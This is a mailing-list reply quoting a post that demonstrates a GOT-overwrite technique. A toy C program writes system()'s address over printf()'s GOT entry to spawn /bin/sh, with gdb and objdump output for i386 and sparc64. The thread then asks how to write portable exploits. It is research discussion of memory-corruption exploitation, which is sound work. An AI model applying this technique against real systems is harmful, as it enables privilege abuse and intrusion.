Re: Linux sparc & GOT

[Guy Cohen <guy () CRYPTO ORG IL>]

I think you can find something at: www.multimania.com/ouah/archspan.html
a document titled "Architecture spanning shellcode" by eugene () subterrain net.

Michel Kaempf <maxx () VIA ECP FR> wrote:
> The following message by Rafal Wojtczuk:
>
> http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-02-
> 01&msg=199801301709.SAA12206 () galera icm edu pl
>
> describes techniques capable of defeating Solar Designer's
> non-executable stack patch. The little program below exploits the first
> technique described in Section III: it overwrites the GOT entry of the
> printf() function with the address of the libc system() function, and
> therefore does not printf() the string /bin/sh, but runs /bin/sh instead
> thanks to system().
>
> % cat got.c
> #include <stdio.h>
> #include <stdlib.h>
>
> int main( int argc, char * argv[] )
> {
>         unsigned long ul_printf;
>         unsigned long ul_system;
>
>         if ( argc != 3 ) {
>                 return( -1 );
>         }
>         ul_printf = strtoul( argv[1], NULL, 0 );
>         ul_system = strtoul( argv[2], NULL, 0 );
>
>         *((unsigned long *)ul_printf) = ul_system;
>         printf( "/bin/sh" );
>
>         return( 0 );
> }
>
> When running on Linux i386, the program works like expected:
>
> % uname -sm
> Linux i686
>
> % gcc -o got got.c
>
> % objdump -R got | grep printf
> 08049530 R_386_JUMP_SLOT   printf
>
> % gdb got
> (gdb) break main
> (gdb) run
> (gdb) p system
> 0x163300
> (gdb) q
>
> % ./got 0x08049530 0x163300
> sh-2.03$
>
> Nice, a shell. On Linux sparc, it does not work like expected:
>
> % uname -sm
> Linux sparc64
>
> % gcc -o got got.c
>
> % objdump -R got | grep printf
> 0000000000021a04 R_SPARC_JMP_SLOT  printf
>
> % gdb got
> (gdb) break main
> (gdb) run
> (gdb) p system
> 0x7007a528
> (gdb) q
>
> % ./got 0x0000000000021a04 0x7007a528
> /bin/sh
>
> No shell, but a printf(). The PLT (Procedure Linkage Table), the
> GOT (Global Offset Table) are not the same on i386 and sparc. When
> disassembling the linker code on both architecures, or comparing the
> `objdump -R' and `objdump -T' outputs, the results are obviously
> different.
>
> Question is: is there a know way to achieve the same technique on
> Linux sparc? I know the non-executable stack patch only works on i386
> architectures, but maybe something similar could be implemented in the
> future for sparc processors, and anyway, the ultimate goal is to be able
> to write portable exploits, working on both sparc and i386 architectures
> without modifications.
>
> Thanks,
>
> --
> MaXX